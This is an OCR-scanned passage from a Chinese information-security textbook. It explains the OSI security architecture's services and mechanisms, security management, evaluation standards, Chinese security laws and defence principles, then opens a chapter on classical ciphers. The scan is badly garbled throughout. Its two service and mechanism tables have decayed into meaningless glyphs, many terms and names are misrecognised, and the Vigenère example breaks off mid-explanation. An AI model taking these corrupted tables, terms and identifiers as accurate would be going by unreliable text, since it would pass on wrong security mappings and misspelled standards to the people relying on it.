务 .8 种 特定 安全 机 制 .5 种 普遍 性 安全 机 制 ,确立 了 安全 服务 与 安全 机 制 的 关系 ,并 确定 了 
安全 管理 。 
0.3.1 OSI 安全 体系 的 安全 服务 

OSI 安全 体系 提供 5 类 安全 服务 。 这 些 服务 都 是 第 N 层 向 第 N 十 1 层 提供 的 。 

OSI 安全 体系 结构 最 重要 的 贡献 是 它 总 结 了 对 于 OSI 的 5 种 安全 服务 ,并 给 出 了 这 些 


安全 服务 在 OSI 七 层 中 的 配置 位 置 (如 表 0. 1 所 示 )。 本 节 中 使 用 的 N 指 OSI 体系 中 的 第 
N 层 。 


表 0.1 OSI 安全 体系 结构 中 的 安全 服务 配置 


安全 服务 OSI 协议 层 C(N) 1 2 3 4 5 6 7 
鉴别 服务 /访问 控制 服务 N 于 
数 | 连接 机 密 性 N 和 
要 无 连接 机 密 性 N 区 Y¥ Y N 区 
加 选择 字段 机 密 性 N 于 
业务 流 机 密 性 到 N N N N 车 
带 恢复 功能 的 连接 完整 性 N N N ¥ N N 区 
无 恢复 功能 的 连接 完整 性 N N 区 区 N N 区 
束 | 无 连接 完整 性 N Iwi|iy | yiNw|iNn|y 
选择 字段 连接 完整 性 N N N N N N 多 
选择 字段 无 连接 完整 性 N N Y N N 至 
抗 抵赖 服务 N N N 区 N N 将 
注 : Y 表示 提供 ,N 表示 不 提供 。 
下 面 介绍 各 种 安全 服务 的 概念 。 
1. 鉴别 服务 


假冒 和 重 放 是 针对 OSI 系统 的 两 种 常见 攻击 形式 。 假 冒 就 是 提供 虚假 身份 。 重 放 就 
是 某 信息 的 全 部 或 部 分 ,以 掩盖 其 他 虚假 信息 。 鉴 别 服务 通过 对 于 通信 的 对 等 实体 (主体 ) 
和 数据 源 的 鉴别 和 确认 来 对 抗 假冒 性 攻击 以 及 重 放 性 攻击 。 

在 OSI 层次 结构 中 , 当 服 务 第 NN 层 提 供 时 ,将 使 第 N 十 1 层 实体 确信 与 之 通信 的 是 它 
需要 的 第 N 层 的 实体 。 按 照 实体 的 作用 分 ,鉴别 服务 可 以 分 为 访问 实体 (对 等 实体 ) 鉴 别 和 
数据 源 ( 数 据 原 发 ) 鉴 别 服务 。 按 照 实体 性 质 分 ,鉴别 服务 应 当 配置 在 如 下 3 个 层次 上 : 
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”主机 地 址 鉴别 一 一 网 络 层 鉴别 ; 

。 进程 地 址 鉴别 一 一 运输 层 鉴别 ; 

。 人 员 账 户 鉴别 一 一 应 用 层 鉴别 。 

2. 访问 控制 服务 

访问 控制 服务 的 安全 目标 是 防止 系统 资源 (系统 的 计算 资源 、 通 信 资 源 、 数 据 资 源 等 ) 的 
非 授权 访问 ,通过 建立 访问 实体 (主体 ) 与 资源 (客体 ) 之 间 的 访问 关系 (如 读 、 写 、 删 除 、 运 行 


等 ) 形 成 授权 机 制 , 决 定 主 体 在 什么 条 件 下 、 为 了 什么 目的 才 可 以 访问 哪些 目标 。 通常 ,访问 
控制 是 与 鉴别 结合 进行 的 ,所 以 访问 控制 服务 也 要 配置 在 网 络 、 运 输 和 应 用 3 层 上 。 


3. 机 密 性 服务 


对 数据 提供 保护 ,使 之 不 被 非 授 权 泄 露 。 按 照 原理 ,机 密 性 服务 可 分 为 2 类 。 
(1) 数据 机 密 性 保护 : 使 攻击 者 难于 从 数据 项 中 推断 出 敏感 信息 。 按 照 被 保护 数据 的 
存在 方式 ,还 可 以 分 为 如 下 3 种 。 

。 连接 机 密 性 保护 : 保证 一 次 (N) 连 接 上 的 全 部 (N) 用 户 数据 都 保护 起 来 ,不 使 非 授 
权 汇 露 。 

。 无 连接 机 密 性 保护 : 为 单个 无 连接 的 N 层 服务 数据 单元 CON-SDU) 中 的 全 部 N 用 户 
数据 提供 机 密 性 保护 。 

。 选择 字段 机 密 性 保护 : 仅 对 处 于 CN) 连 接 的 用 户 数据 或 无 连接 的 C(N-SDU) 中 所 选 
择 的 字段 提供 机 密 性 保护 。 

(2) 业务 流 机 密 性 保护 : 使 攻击 者 不 能 通过 观察 通信 业务 流 推 断 出 其 中 的 敏感 信息 。 


4. 完整 性 服务 


完整 性 服务 用 以 对 抗 主动 攻击 ,保护 数据 在 存储 ,传输 等 过 程 中 不 被 非 授 权 修 改 (如 插 
入 、 自 改 、 重 排序 或 延迟 等 ) ,以 提供 准确 的 数据 。 它 可 以 用 于 一 个 数据 流 .单个 数据 或 一 个 
选 定 的 数据 字段 ,并 分 为 带 有 恢复 功能 和 不 带 恢 复 功 能 。 带 恢复 的 完整 性 服务 在 检测 到 完 
整 性 破坏 后 ,可 以 正确 地 将 数据 恢复 到 被 破坏 前 的 样子 。 在 ISO/IEC 7498-2 中 ,将 之 分 为 
如 下 几 类 。 

(1) 选择 字段 完整 性 服务 ,又 分 为 连接 和 无 连接 两 种 。 这 种 服务 仅 对 某 个 数据 单元 中 
所 指定 的 字段 进行 完整 性 保护 。 由 于 它 必 须 对 数据 单元 中 的 不 同 字段 请 求 明 确 的 保护 形 
式 , 因 此 只 能 配置 在 应 用 层 。 

(2) 连接 与 无 连接 完整 性 服务 ,包括 无 连接 完整 性 服务 和 无 恢复 的 连接 完整 性 服务 。 
这 种 服务 主要 配置 在 应 用 层 、 传 输 层 、 网 络 层 .数据 链 路 层 和 物理 层 , 具 体 配 置 在 哪 一 层 取决 
于 媒体 技术 。 

(3) 带 恢复 的 连接 完整 性 服务 可 在 传输 层 和 应 用 层 配置 。 


5. 抗 抵赖 服务 


这 种 服务 通过 提供 证 据 来 证 实 某 通信 实体 的 诚实 性 。 它 分 为 如 下 两 类 : 
到 


(1) 有 数据 原 发 证 明 的 抗 抵赖 : 防止 发 送 方 抵赖 。 
(2) 有 数据 交付 证 明 的 抗 抵赖 : 防止 接收 方 抵 赖 。 


0.3.2 OSI 安全 体系 安全 机 制 


1. 基本 安全 机 制 


安全 服务 通过 安全 机 制 实现 。 同 一 安全 机 制 也 可 以 用 于 实现 不 同 的 安全 服务 。ISO/ 
IEC 7498-2 中 列 出 的 安全 机 制 包括 如 下 一 些 内 容 。 
(1) 加 密 机 制 
加 密 机 制 能 为 数据 提供 机 密 性 ,也 能 为 通信 业务 流 信 息 提供 机 密 性 ,通常 采用 密码 \ 信 
息 隐藏 等 方法 实现 。 
(2) 数据 签名 机 制 
用 以 提供 认证 或 抗 抵赖 服务 ,是 基于 密码 体制 的 一 种 机 制 。 
(3) 访问 控制 机 制 
用 来 实施 对 资源 访问 或 操作 的 限制 ,可 以 支持 的 安全 目标 有 : 
。 数据 机 密 性 ; 
。 数据 完整 性 ; 
。 可 用 性 。 
(4) 完整 性 保护 机 制 
用 于 避免 未 授权 的 数据 乱 序 、 丢 失 、 重 放 、 插 入 以 及 算 改 ,具体 技术 有 校 验 码 ( 抗 修改 ) 、 
顺序 号 ( 防 乱 序 ) 、 时 间 标 记 ( 防 重 放 、 防 丢失 ) 等 。 
(5) 通信 业 填 充 机 制 
通信 业 填 充 机 制 是 一 种 用 于 提供 业务 流 机 密 性 保护 的 反 分 析 机 制 , 它 可 以 生成 伪造 的 
通信 和 实例、 伪造 的 数据 单元 或 数据 单元 中 伪造 的 数据 ,使 攻击 者 难于 从 数据 流量 方面 对 通信 
业务 进行 分 析 。 
(6) 路 由 选择 控制 机 制 
路 由 选择 控制 机 制 可 以 动态 地 或 预定 地 选择 路 由 ,以 便 只 使 用 物理 上 安全 的 子 网 络 、 中 
继 站 或 链 路 进行 通信 。 例 如 : 
。 当 检 测 到 有 持续 的 攻击 时 , 便 指示 网 络 服务 提供 者 要 经 过 别 的 路 由 建立 连接 ; 
。 依据 安全 策略 ,可 以 禁止 带 有 某 些 安全 标记 的 数据 通过 某 些 子 网 络 、 中 继 站 或 链 路 ，; 
。 连接 的 发 起 者 或 无 连接 中 数据 的 发 送 者 ,可 以 指定 路 由 选择 说 明 , 以 请 求 回避 某 些 
特定 的 子 网 络 .中 继 站 或 链 路 。 
(7) 公证 机 制 
公证 机 制 是 一 种 由 可 信 的 第 三 方 提供 的 安全 保证 机 制 。 可 信 的 第 三 方 接受 通信 实体 的 
委托 ,利用 所 掌握 的 能 够 证 明 可 信赖 的 信息 ,提供 密 钥 分 配 .数字 签名 等 ,对 通信 实体 ( 信 源 、 
通信 时 间 和 目的 地 等 ) 的 真实 性 、 信 息 的 完整 性 加 以 保证 。 
公证 的 方式 有 两 种 : 仲裁 方式 和 判决 方式 。 
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(8) 鉴别 交换 机 制 

鉴别 交换 机 制 用 于 在 N 层 提供 对 等 实体 鉴别 ,采用 的 技术 有 : 

。 鉴别 信息 ,如 口令 .生物 信息 .身份 卡 等 ; 

。 密码 技术 。 

鉴别 技术 的 选用 取决 于 使 用 的 环境 。 在 许多 场合 下 ,还 必须 附 以 其 他 一 些 技术 ,如 : 
。 时 间 标 记 与 同步 时 钟 。 

。 二 次 握手 (对 应 单方 鉴别 ) 或 三 次 握手 (对 应 双方 鉴别 ) 。 

。 抗 否认 机 制 : 数字 签名 和 公认 机 制 。 


2. 安全 机 制 与 安全 服务 之 间 的 关系 
ISO 7498-2 标准 还 给 出 了 安全 服务 和 所 采用 的 安全 机 制 之 间 的 关系 , 见 表 0. 2。 
表 0.2 OSI 安全 服务 与 安全 机 制 之 间 的 关系 


泽 
EJ 


加 密 


bo 
活 
冰 
六 
过 
灌 
次 
全 
NN 


安全 服务 
鉴别 | 对 等 实体 鉴别 
服务 | 数据 原 发 鉴别 
访问 控制 服务 
机 | 连接 /无 连接 的 机 密 性 
要 选择 字段 机 密 性 
通信 业务 流 机 密 性 
连接 完整 性 
无 连接 完整 性 
抗 抵赖 服务 

注 : Y 代表 提供 ,N 代表 不 提供 。 


签名 | 控制 | 完整 性 


zz 
zz 


Zlx<i<lI<I<i<x|ix|ix|x 
<|Ix|izlzlzlizlzix|~« 
二 | 芝 | 号 | 芝 | 中 芝 | 站 | 党 
由 | 只 | 只 | 艺 | 世 | 艺 | 世 | 艺 
过 | 芝 | 芝 | 营 让 营 || 芝 | 富有 区 | 二 
| 这 | 各 中 总 芝 | 受 | 名 
芝 | 画 | 芝 | 庆 || 区 中 吉 | 艺苑 
| || 芝 | 之 


3. 普遍 性 安全 机 制 


在 OSI 安全 体系 中 还 定义 了 5 种 不 为 特定 服务 而 设置 的 安全 机 制 , 称 为 普遍 性 安全 机 
制 。 这 些 普遍 性 安全 机 制 并 非 完 全 技术 性 的 ,有 些 也 被 看 作 是 安全 管理 的 机 制 。 

(1) 安全 标记 机 制 

安全 标记 可 以 为 某 一 资源 (例如 数据 单元 ) 命 名 或 指定 安全 属性 约束 。 这 种 标记 或 约束 
可 以 有 两 种 形式 : 

。 显 式 的 ,例如 校 验 码 等 与 传送 数据 相连 的 附加 数据 。 

。 隐 含 的 ,例如 加 密 数据 中 隐 含 着 密 钥 约束 。 

(2) 事件 检测 机 制 

事件 检测 指 与 安全 有 关 的 事件 的 检测 ,例如 对 于 特定 安全 侵害 事件 .特定 选择 事件 、 对 
事件 发 生 次 数 计数 的 溢出 等 的 检测 。 这 些 检测 一 般 要 引起 一 个 或 多 个 动作 ,如 对 事件 的 报 
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告 ` 记 录 以 及 恢复 等 。 

(3) 安全 审计 跟踪 机 制 

安全 审计 跟踪 机 制 具有 如 下 作用 : 

。 记录 可 疑 事件 (可 以 产生 一 个 安全 报警 ) ; 

。 记录 许多 日 常事 件 ( 如 连接 的 建立 和 终止 .使 用 安全 机 制 和 访问 敏感 资源 等 ); 

。 将 事件 消息 传递 给 维护 日 志 ; 

。 为 检查 和 调查 安全 的 漏洞 提供 资料 ; 

。 通过 列举 被 记录 的 安全 事件 类 型 ,对 某 些 潜 在 的 攻击 起 威慑 作用 。 

(4) 安全 恢复 机 制 

安全 恢复 机 制 可 以 根据 事件 处 理 和 管理 功能 等 机 制 的 请 求 , 对 于 事件 应 用 一 组 规则 后 
进行 系统 人 恢复。 恢复 动 作 有 3 种 类 型 : 

。 立即 动作 , 即 立 即 放弃 操作 (如 断 开 连 接 )， 

。 暂时 动作 ,即使 实体 暂时 无 效 ( 如 关闭 )， 

。 长 期 动作 , 即 把 实体 列 人 黑 名单 等 。 

(5) 可 信 功 能 机 制 

可 信和 功能 机 制 具 有 如 下 作用 : 

。 延伸 其 他 安全 机 制 的 范围 或 所 建立 的 有 效 性 。 因 为 直接 提供 的 安全 机 制 或 安全 访 

问 机 制 的 任意 功能 都 应 当 是 可 信和 的。 
。 提供 对 某 些 硬件 和 软件 可 信赖 性 的 保证 。 


0.3.3 信息 系统 的 安全 管理 


按照 IJATE 的 “纵深 防御 策略 ”, 具 体 的 任务 要 依赖 于 人 、 技 术 和 运作 三 者 协调 完成 ,或 
者 说 , 它 是 一 个 由 技术 保障 体系 、 组 织 保障 体系 和 管理 保障 体系 组 成 的 系统 。 

管理 是 在 群体 活动 中 ,为 了 完成 一 定 的 任务 、 实 现 预期 的 目标 ,针对 特定 的 对 象 ,根据 具 
体 的 环境 ,采用 适宜 的 方法 ,遵循 规定 的 原则 ,所 进行 的 计划 制定 ,机构 建立, 程序 设计 、 措 施 
落实 \ 培 训 教 育 、 效 果 检 查 、 改 进 落实 等 活动 。 

随 着 信息 (系统 ) 安 全 保障 概念 的 确立 和 发 展 , 人 们 越 来 越 认识 到 信息 安全 管理 在 信息 
安全 体系 中 的 作用 远 远 大 于 技术 ,并 且 只 有 有 了 有 效 的 管理 保障 ,技术 才能 发 挥 积极 的 
作用 。 


1. 安全 策略 


安全 策略 (security policy) 是 在 一 个 特定 的 环境 (安全 区 域 ) 里 ,为 保证 提供 一 定 级 别 的 
安全 保护 所 必须 遵循 的 一 系列 条 例 和 规则 。 它 是 现代 信息 保障 理论 的 核心 , 它 提供 的 一 套 
准则 从 全 局 角度 看 对 于 信息 系统 的 安全 起 着 指导 性 作用 。 随 着 信息 化 的 推进 ,信息 系统 的 
作用 日 趋 显要 、 结 构 不 断 复 杂 、 规 模 越 来 越 大 、 威 胁 越 来 越 多 ,安全 的 问题 越 来 越 严重 .也 越 
来 越 突 出 和 困难 ,安全 策略 的 指定 越 来 越 重要 。 

安全 策略 的 作用 是 建立 一 个 具有 指导 性 的 安全 技术 和 管理 规范 ,是 在 进行 系统 风险 分 
析 的 基础 上 ,对 于 控制 策略 .安全 模型 .安全 等 级 .评价 标准 等 提出 的 一 个 基本 框架 性 文件 。 
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一 般 来 说 ,安全 策略 文件 至 少 要 包括 如 下 内 容 : 

(1) 对 系统 安全 的 定义 、 总 体 目 标 和 保护 范围 。 

(2) 支持 安全 目标 和 原则 的 管理 意向 声明 。 

(3) 对 于 安全 政策 原则、 标准 和 要 求 的 简要 解释 ,例如 : 

。 符合 立法 和 契约 的 规定 ; 

。 安全 教育 的 要 求 ; 

。 对 于 攻击 的 预防 和 检测 ; 

。 持续 运行 管理 ; 

。 违反 安全 策略 的 后 果 等 。 

(4) 安全 管理 的 总 体 定义 .具体 权 责 要 求 等 。 

(5) 有 关 支 持 政策 的 文献 援引 ,例如 适用 于 具体 信息 系统 的 较为 详细 的 安全 政策 流程 
或 使 用 者 应 当 遵循 的 安全 条 例 等 。 


2. 安全 管理 活动 


OSI 的 安全 管理 活动 主要 有 如 下 几 类 : 

(1) 安全 服务 管理 

安全 服务 管理 是 为 特定 安全 服务 实施 管理 活动 ,在 管理 某 一 特定 安全 服务 时 ,所 执行 的 
管理 活动 有 : 

。 为 该 安全 服务 确定 和 指派 安全 保护 目标 ; 

。 为 该 安全 服务 选择 特定 的 安全 机 制 ; 

。 对 需要 事先 取得 管理 者 同意 的 可 用 安全 机 制 进行 协商 ; 

。 通 过 适当 的 安全 机 制 管 理 功能 调用 特定 安全 机 制 。 

(2) 安全 机 制 管 理 

安全 机 制 管理 是 对 各 项 安全 机 制 的 功能 、 参 数 和 协议 的 管理 。 

(3) 安全 事件 处 理 管 理 

安全 事件 处 理 管理 的 主要 活动 有 : 

。 报告 包括 远程 的 明显 违反 系统 安全 的 企图 ; 

。 确定 和 修订 触发 安全 事件 报告 的 阔 值 。 

(4) 安全 审计 管理 

安全 审计 管理 的 主要 活动 有 : 

。 收集 .记录 安全 事件 ; 

。 授予 或 取消 对 所 选用 事件 进行 审计 跟踪 (记录 、` 调 查 ) 的 能 力 ; 

。 准备 安全 审计 报告 。 

(5) 安全 恢复 管理 

安全 恢复 管理 的 主要 活动 有 : 

。 制定 并 维护 安全 事故 的 恢复 计划 .操作 规程 和 细则 ; 

。 提出 完备 的 安全 恢复 报告 。 

。2] 。 


(6) 安全 行政 管理 
安全 行政 管理 的 主要 活动 有 : 


建立 专门 的 安全 管理 机 构 ; 
建立 完善 的 安全 管理 制度 ; 
配备 专门 的 安全 管理 人 员 ,并 进行 培训 、 考 察 .评价 等 管理 。 


(7) 系统 安全 管理 
系统 安全 管理 是 一 项 综合 管理 。 它 的 主要 活动 有 : 
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管理 总 体 安全 策略 ,维护 其 一 致 性 ; 

依据 系统 总 体 的 安全 策略 ,在 系统 中 建立 不 同等 级 的 安全 管理 信息 库 CSMIB) ,以 存 
储 与 系统 安全 有 关 的 全 部 信息 ; 

维护 安全 管理 协议 ,保证 安全 服务 管理 和 安全 机 制 管理 之 间 的 正常 交互 功能 。 


信息 系统 的 安全 标准 


标准 是 衡量 、 评 估 、 评 测 的 准则 。 以 互 连 、 互 通 、 互 操作 为 特征 的 现代 信息 系统 是 建立 在 
一 系列 准则 或 协议 基础 上 的 复杂 系统 ,其 安全 也 需要 用 一 定 的 标准 进行 规范 .评估 和 评测 。 

信息 系统 安全 标准 大 体 可 以 分 为 3 类 : 

(1) 针对 信息 系统 (包括 产品 ) 的 安全 性 评测 准则 


美国 国防 部 的 《可 信 计 算 机 系统 评估 准则 》(Trusted Computer System Evaluation 
Criteria,TCSEC,1983) ,也 称 橘 皮 书 ,主要 对 操作 系统 进行 评估 ,将 之 安全 分 为 D、 
Cl、C2、B1、B2、B3、Al 共 7 个 等 级 。 这 是 IT 历史 上 第 一 个 安全 评估 标准 。 

欧洲 (英国 .德国 .法国 ,荷兰 ) 的 (信息 技术 安全 性 评估 准则 》(Information Technolo- 
gy Security Evaluation Criteria,ITSEC,1990) ,也 称 白皮书 。 

加 拿 大 的 《可 信 计 算 机 产品 评估 准则 3. 30》(CTCPEC 3. 0,1992. 4) ,将 安全 需求 分 
为 4 个 层次 : 机 密 性 、 完 整 性 、 可 靠 性 和 可 说 明 性 。 

六 国 七 方 (英国 ,加拿大 、 法 国 、 德 国 \ 荷 兰 、 美 国 国家 安全 局 和 美国 标准 技术 研究 所 ) 
的 《信息 技术 安全 评估 通用 标准 》(Common Criteria of Information Technical Secu- 
rity Evaluation ,CCITSE) ,简称 CC ,是 在 TCSEC 基础 上 的 改进 ,从 对 操作 系统 评估 
扩充 到 信息 技术 产品 和 系统 。 

ISO/IEC 21827: 2002,《 信 息 安全 工程 能 力 成 熟 度 模型 )(System Secrrity Engineer- 
ing Capability Maturity Model, SSE-CMM) 是 一 个 关于 信息 安全 建设 工程 实施 方面 
的 标准 ,通常 使 用 过 程 改 善 . 能 力 评估 和 保证 3 种 方式 应 用 。 

中 华人 民 共 和 国 国 家 标准 GB 17895-1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准 
则 》, 将 计算 机 信息 系统 安全 保护 能 力 划分 为 5 个 等 级 ,于 2001 年 1 月 1 日 起 实施 。 


(2) 针对 使 用 信息 系统 的 组 织 的 安全 管理 标准 


ISO/IEC 17799: 2000《 信 息 技术 信息 安全 管理 实用 规则 》, 从 信息 安全 策略 .组织 的 
安全 ,资产 分 类 和 管理 .人 员 安 全 ,物理 和 环境 安全 .通信 和 操作 管理 .访问 控制 、 系 
统 开发 和 维护 .业务 连续 性 管理 .符合 性 10 个 方面 介绍 了 36 个 信息 安全 控制 目标 
以 及 实现 这 些 目 标的 127 个 控制 措施 。 
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。 基于 信息 安全 管理 体系 (ISMS) 的 标准 ,如 : 风险 评估 标准 ISO/IEC TR 13335-3《IT 
安全 管理 指南 》(GMITS) ,管理 体系 标准 ISO 9001: 2000 ISO 14000、BS 7799-2 : 
2002 ISO Guide 72 和 73 等。 

。 中 国 的 4 计算 机 信息 系统 安全 保护 条 例 》《 计 算 机 信息 系统 安全 等 级 保护 管理 要 
求 ) 等 。 

(3) 针对 不 同安 全 产品 的 互 操作 性 的 互 操作 标准 

。 加 密 标准 DES; 

。 安全 电子 邮件 标准 SMIME; 

。 安全 电子 商务 标准 SET。 


4. 信息 系统 安全 立法 


法 律 是 由 国家 政权 保证 执行 的 行为 规范 。 下 面 主要 介绍 中 国有 关 信 息 ( 系 统 ) 安 全 的 有 
《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》(1994 年 2 月 18 日 国务 院 令 第 
147 二 
。《 计 算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 (公安 部 1997 年 12 月 30 日 发 布 )。 
《中 华人 民 共 和 国 刑法 (1997 年 3 月 14 日 第 八 届 全 国人 民 代 表 大 会 常务 委员 会 第 
五 次 会 议 通过 ) 。 

*。《 全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 》(2000 年 12 月 28 日 第 

九 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 九 次 会 议 表 决 通过 ) 。 

《计算 机 病毒 防治 管理 办 法 》( 公 安 部 2000 年 4 月 26 日 发 布 执行 ) 。 

《计算 机 信息 系统 国际 联网 保密 管理 规定 》( 国 家 保密 局 发 布 2000 年 1 月 1 日 起 执 

行 ) 。 

。《 互 联网 电子 公告 服务 管理 规定 》(2000 年 10 月 8 日 中 华人 民 共 和 国信 息 产 业 部 第 

三 号 令 ) 。 

《计算 机 软件 保护 条 例 》(2001 年 2 月 20 日 国务 院 令 第 339 号 ) 。 

。《 中 华人 民 共 和 国电 子 签名 法 》(2004 年 8 月 28 日 第 十 届 全 国人 民 代 表 大 会 常务 委 
员 会 第 十 一 次 会 议 通 过 ,2005 年 4 月 1 日 执行 )。 

。《 互 联网 著作 权 行 政 保护 办 法 (国家 版 权 局 信息 产业 部 2005 年 4 月 30 日 共同 颁 
布 ,5 月 30 日 起 执行 )。 


0.3.4 信息 系统 安全 的 防御 原则 


信息 系统 的 安全 是 防御 式 安全 。 因 此 在 系统 的 规划 .设计 、 实 现 、 集 成 .安装 .调试 等 所 
有 过 程 中 ,都 应 同步 考虑 安全 策略 和 功能 具备 的 程度 ,坚持 预防 为 主 , 不 要 存在 侥幸 心理 而 
放 掉 任 何 一 个 已 经 发 现 的 漏洞 和 可 能 出 现 的 安全 威胁 。 

不 同 的 组 织 在 不 同 的 背景 下 ,基于 不 同 的 利益 考虑 ,往往 会 制定 出 一 些 进行 信息 系统 安 
全 的 防御 原则 。 下 面 介绍 目前 已 经 取得 共识 的 信息 系统 安全 防御 原则 。 
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1. 木 桶 原则 


木 桶 原则 也 称 均衡 防护 原则 。 它 是 基于 “ 木 桶 的 容积 由 其 最 短 的 一 块 木板 决定 ”的 原 
则 ,考虑 到 即使 绝 大 部 分 的 环节 上 防御 能 力 极 强 ,只 要 有 一 处 很 弱 , 系 统 总 体 的 防御 力也 是 
弱 的 。 因 此 ,要 对 于 最 常见 的 攻击 手段 采取 均衡 防护 。 


2. 成 本 效率 原则 


任何 系统 都 不 是 100% 安 全 的 ,因为 100% 安 全 要 求 的 成 本 可 能 是 无 限 的 。 因 此 ,成 本 
效率 原则 要 求 针 对 系统 的 重要 性 , 设 定 相应 的 安全 需求 级 别 ,采取 相应 的 安全 措施 。 


3. 可 扩展 性 原则 


考虑 信息 系统 的 发 展 、 规 模 的 变化 以 及 新 的 风险 的 出 现 ,要 求 安全 体系 具有 可 扩展 性 和 
延续 性 。 


4. 分 权 制 衡 原则 

要 害 部 位 的 管理 权限 不 应 当 交 给 一 个 人 管理 ,要 将 权利 分 割 给 几 个 人 ,以 便 互 相 制 约 。 
5. 最 小 特权 原则 

对 于 某 个 人 只 有 需要 时 才 可 以 授予 某 种 特权 ,但 同时 要 限制 其 他 的 系统 特权 。 

6. 失效 保护 原则 


系统 应 当 是 可 控 的 。 一 旦 系统 控制 失灵 ,要 有 紧急 响应 预案 ,阻止 风险 草 延 和 系统 恶 
化 。 例 如 ,一 旦 系统 发 生 故 障 ,必须 拒绝 入 侵 者 的 访问 ; 包 过 滤 路 由 器 发 生 故 障 , 将 不 允许 任 
何 数据 包 流 通 ; 某 代理 服务 器 出 现 故 障 , 就 再 不 提供 服务 等 。 

7. 公开 揭露 原则 


任何 系统 遭受 某 种 人 侵 , 都 是 由 于 系统 存在 相应 的 漏洞 。 对 于 发 现 的 漏洞 ,有 人 认为 应 
当 了 予以 保密 ,以 防 更 多 的 人 侵 。 但 是 ,现在 普遍 的 观点 是 应 当 公开 漏洞 ,一 是 可 以 引起 广泛 
的 注意 和 防护 ,二 是 可 以 发 动 更 多 的 人 或 组 织 提供 补救 措施 ,三 是 可 以 对 入 侵 者 以 威慑 。 


8. 立足 国内 原则 

安全 技术 和 设备 首先 要 立足 国内 .未 经 批准 不 得 消化 ,改造 或 直接 应 用 国外 的 技术 和 
设备 。 

9. 可 评估 原则 


安全 系统 的 规划 ,设计 实施、 运行 都 要 有 章 可 循 ,同时 要 考虑 用 户 对 于 安全 的 需求 和 具 
体 环境 ,使 安全 系统 成 为 可 以 论证 、 可 以 评估 的 系统 。 
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习 是 


1. 对 于 信息 及 信息 系统 的 安全 威胁 ,会 随 着 信息 系统 的 发 展 和 人 的 认识 的 深化 而 变 
化 。 请 说 出 自己 认为 信息 系统 面临 的 威胁 有 哪些 ?造成 这 些 威胁 的 根源 在 哪里 ? 

2. 如 何 看 待 信息 系统 的 脆弱 性 ? 信息 系统 脆弱 性 有 哪些 ?它们 的 根源 在 什么 地 方 ? 

3. 人 们 对 信息 安全 的 属性 的 认识 会 随 技术 环境 的 发 展 和 认识 的 深化 而 不 同 。 请 说 明 
在 不 同 的 技术 环境 下 ,对 于 信息 安全 的 属性 的 理解 有 哪些 不 同 ? 

4. 关于 信息 系统 安全 概念 的 演化 过 程 ,业界 有 不 同 的 阶段 划分 方法 。 请 查阅 资料 , 收 
集 不 同 的 信息 安全 概念 的 划分 方法 并 进行 比较 。 

5. 为 什么 信息 保障 的 概念 目前 会 取得 广泛 的 共识 ? 

6. 本 书 中 列举 了 3 个 信息 (系统 ) 管 理 安全 模型 : PDR、PDRR 和 PPDR。 请 查阅 资料 ， 
说 明 还 有 哪些 信息 (系统 ) 管 理 安全 模型 ,进一步 了 解 这 些 模 型 中 各 部 分 的 含义 ,并 透 过 这 些 
模型 的 发 展 说 明了 一 些 什么 样 的 实质 性 问题 。 

7. 如 何 理解 OSI 安全 体系 结构 中 的 安全 服务 .安全 机 制 及 其 它们 之 间 的 关系 ? 

8. 安全 服务 与 系统 的 各 层 之 间 有 什么 关系 ? 请 按照 OSI 安全 体系 结构 中 的 安全 服务 
在 各 层 中 的 配置 ,推导 出 TCP/IP 体系 中 各 层 的 安全 服务 配置 。 

9. 信息 系统 的 安全 管理 与 安全 技术 之 间 有 什么 关系 ? 安全 管理 包括 哪些 内 容 ? 

10. 有 人 说 ,管理 就 是 让 别人 帮 你 把 事情 做 好 。 也 有 人 说 ,管理 就 是 使 任务 顺利 完成 。 
因此 ,每 个 管理 工作 都 有 确定 的 目标 ,有 管理 的 对 象 , 也 有 需要 遵循 的 一 些 原 则 。 由 于 人 们 
的 认识 的 差异 .环境 的 差别 .系统 结构 的 不 同 ,在 每 一 个 具体 情况 下 ,这 三 者 是 不 相同 的 。 就 
你 的 理解 来 讨论 这 三 者 及 其 之 间 的 关系 。 

11. 分 析 信 息 系统 安全 标准 和 法 律 之 间 的 异同 。 
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第 1 章 数 所 保密 


迄今 为 止 ,信息 保护 的 最 重要 手段 是 数据 保密 。 数 据 保 密 就 是 隐蔽 数据 ,其 方法 有 以 下 
两 种 。 

(1) 数据 加 密 , 即 隐蔽 数据 的 可 读 性 : 将 可 读 的 数据 , 即 明 文 (paintext) ,也 叫 明码 , 转 
换 为 不 可 读数 据 , 即 密 文 (cphertext) ,也 称 密码 ,使 非法 者 不 能 直接 了 解数 据 的 内 容 。 加 密 
的 逆 过 程 称 为 解密 。 

(2) 数据 隐藏 , 即 隐蔽 数据 的 存在 性 : 将 数据 隐藏 在 一 个 容量 更 大 的 数据 载体 之 中 , 形 
成 隐秘 载体 ,使 非法 者 难于 察觉 其 中 隐藏 有 某 些 数据 ,或 难于 从 中 提取 被 隐藏 数据 。 


1.1 数据 加 密 技 术 概述 


如 果 用 已 表 示 明 文 , 用 C 表示 密 文 , 则 可 以 将 加 密 写成 如 下 函数 形式 : 
C = Erx(P) 
这 里 ,EE 为 加 密 函 数 ,EK 称 为 加 密 密 钥 。 下 面 通过 介绍 几 种 简单 的 加 密 方法 介绍 加 密 
算法 和 密 钥 的 概念 以 及 加 密 算法 与 密 钥 之 间 的 关系 。 


1.1.1 替代 密码 


蔡 代 密 码 就 是 将 明文 中 的 每 个 位 置 的 字母 都 用 其 他 字母 代替 。 比 较 简单 的 置换 方法 是 
恺 撒 算法 , 它 将 明文 中 的 每 个 字母 都 用 相隔 一 定 距离 的 另 一 个 字母 代替 。 例 如 将 明文 
“CHINA” 中 的 每 个 字母 都 用 字母 表 中 后 面 的 距离 为 5 的 字母 代替 ,就 会 变 成 密 文 
“HMNSF”。 这 里 “在 字母 表 上 移动 一 个 距离 "就 称 为 加 密 算法 ,距离 “5” 就 称 为 加 密 密 钥 。 
这 种 加 密 的 强度 非常 低 , 破 译 者 最 多 只 要 按 字母 表 试 25 次 ,就 能 根据 组 词 规则 破译 密 文 。 

(1) 以 法 国 密码 学 家 Vigenere 命名 的 维 吉利 亚 密码 就 是 一 种 比较 复杂 的 替代 密 
码 。 设 

P= data security, EK = basic 

则 采用 维 吉利 亚 密 码 的 加 密 过 程 如 下 : 

